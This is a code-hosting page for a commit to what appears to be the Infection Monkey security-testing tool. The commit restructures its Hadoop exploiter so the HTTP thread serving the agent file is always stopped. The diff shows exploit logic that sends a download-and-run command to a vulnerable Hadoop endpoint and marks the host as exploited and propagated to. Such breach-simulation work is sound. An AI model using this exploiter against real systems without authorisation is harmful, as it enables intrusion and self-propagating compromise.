p34709852
/
monkey
forked from p15670423/monkey
1
0
Fork 1
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Stop Hadoop http_thread regardless the exploit result

This commit is contained in:
Ilija Lazoroski 2022-02-24 12:21:54 +01:00
parent 4d6869fbf6
commit 871b02d514
1 changed files with 12 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
monkey/infection_monkey/exploit/hadoop.py
View File

@ -46,14 +46,18 @@ class HadoopExploiter(WebRCE):
if not paths: if not paths:
return self.exploit_result return self.exploit_result
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"]) http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])
command = self._build_command(paths["dest_path"], http_path)
if not self.exploit(self.vulnerable_urls[0], command): try:
return self.exploit_result command = self._build_command(paths["dest_path"], http_path)
http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop() if self.exploit(self.vulnerable_urls[0], command):
self.add_executed_cmd(command) self.add_executed_cmd(command)
self.exploit_result.exploitation_success = True self.exploit_result.exploitation_success = True
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
finally:
http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop()
return self.exploit_result return self.exploit_result
def exploit(self, url, command): def exploit(self, url, command):